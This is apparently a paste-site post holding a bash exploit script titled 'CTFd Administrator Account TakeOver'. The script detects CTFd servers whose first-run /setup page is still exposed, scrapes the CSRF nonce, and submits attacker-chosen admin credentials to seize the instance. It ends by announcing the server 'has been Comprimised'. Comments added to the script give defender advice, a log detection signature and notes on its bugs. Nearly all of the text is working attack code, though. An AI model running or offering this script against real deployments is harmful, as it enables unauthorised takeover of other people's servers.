AZZATSSINS_CYBERSERK

CTFd Administrator Account TakeOver

Jan 8th, 2020
#!/bin/bash
# Checks whether a CTFd instance still serves its first-run /setup page
# (detected via the default <title>CTFd</title> and <h1>Setup</h1>) and, if the
# operator confirms, submits the setup form with the values entered below.
#
# Defender notes:
#   - Any CTFd deployment that still answers on /setup can be claimed by whoever
#     reaches it first; finish the setup wizard (or keep the instance off the
#     network) before exposing it.
#   - Every request here carries the fixed all-zero session cookie seen in the
#     -H/-b arguments below; requests to /setup with that literal cookie value
#     are a straightforward detection signature in web-server logs.
#
# Review notes on the script itself (behaviour left as-is here):
#   - `read` is used without -r and the expansions below are unquoted, so
#     inputs containing spaces, globs or backslashes will misbehave.
#   - The password is read without -s and is passed to curl on the command
#     line, so it is echoed to the terminal and visible in the process list.
#   - Scratch files `preexp` / `postexp` are written to the current directory.

clear
# Two words are expected on one line; "$port" stays empty if only one is given,
# and the unquoted `[ $port -lt ... ]` below then fails with a test error.
read -p "Enter Target Address Followed by Port: " target port   # localhost 8080

if [ $port -lt 65536 ] && [ $port -gt 0 ]; then
  # No URL scheme here (curl defaults to http), unlike the POST further down.
  curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' $target:$port/setup > preexp  #Downloaded to check <title>, <h1> and nonce values.
else
    echo "Incorrect Port."
fi
# NOTE(review): the else-branch does not exit, so on a bad port the greps and
# `rm preexp` below run against a file that was never created.

titleCheck=$(grep '<title>CTFd</title>' preexp)          #If server is not configured, default <title> value is 'CTFd' until admin changes
headerOneCheck=$(grep '<h1>Setup</h1>' preexp)          #Due to the possibility of admin naming server to 'CTFd', a check for <h1> value 'Setup' is made to double check.
# Takes the 4th whitespace-separated field of the `var csrf_nonce` line, then
# strips its first character and last two characters (presumably the
# surrounding quote and the closing `";` — confirm against the page markup).
nonce=$(grep 'var csrf_nonce' preexp | awk '{print $4}' | sed 's/.//;s/..$//')  #This nonce will include cookie value of 'session=00000000-0000-0000-0000-000000000000' so don't worry;)
rm preexp

# $titleCheck / $headerOneCheck are unquoted: when grep matched nothing they
# expand to no word at all and `[` reports a usage error rather than a clean
# false, which still lands in the final `else` ("Something went Wrong").
if [ $titleCheck = "<title>CTFd</title>" ] && [ $headerOneCheck = "<h1>Setup</h1>" ]; then
  read -p "Target is Vulnerable, Would you Like to Attack? (Y/n): " attack
  if [ "$attack" = 'y' ] || [ "$attack" = 'Y' ]; then
    clear
    read -p 'CTF Name: ' ctfName      #Name for the CTF
    read -p 'Admin Username: ' adminName    #Username for the administration account
    read -p 'Admin Email: ' adminEmail    #Email address for the administration account
    read -p 'Admin Password: ' adminPassword  #Password for the administration account (echoed: no -s)
    read -p 'User Mode (teams/users): ' userMode  #Dictates whether users join teams to play (Team Mode) or play as themselves (User Mode)
    clear

    echo Working on it...
    # Form body is built by plain string concatenation with no URL-encoding;
    # the scheme is hard-coded to http:// here, unlike the two GETs.
    curl --silent -i -X POST -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' --data 'nonce='$nonce'&ctf_name='$ctfName'&name='$adminName'&email='$adminEmail'&password='$adminPassword'&user_mode='$userMode'' http://$target:$port/setup  #Send previously entered values to $target
    clear
    echo Attack Executed!

    # Re-fetch /setup: once setup has completed, CTFd no longer serves the
    # default title/heading, so the same two greps should now come back empty.
    curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' $target:$port/setup > postexp  #Verify successful exploit
    titleCheck=$(grep '<title>CTFd</title>' postexp)
    headerOneCheck=$(grep '<h1>Setup</h1>' postexp)
    rm postexp

    if [ $titleCheck = "<title>CTFd</title>" ] && [ $headerOneCheck = "<h1>Setup</h1>" ]; then  #Values should be different from what we started with pre-setup
      clear
      echo Something went Wrong, Try Again.
    else
      clear
      echo 'CTFd Server Hosted @ '$target' has been Comprimised:)'
    fi
  fi
else
  # Reached both when the page is not the setup page and when the `[` tests
  # above errored (empty or multi-word grep output); the two cases are not
  # distinguished.
  echo Something went Wrong, Try Again.
fi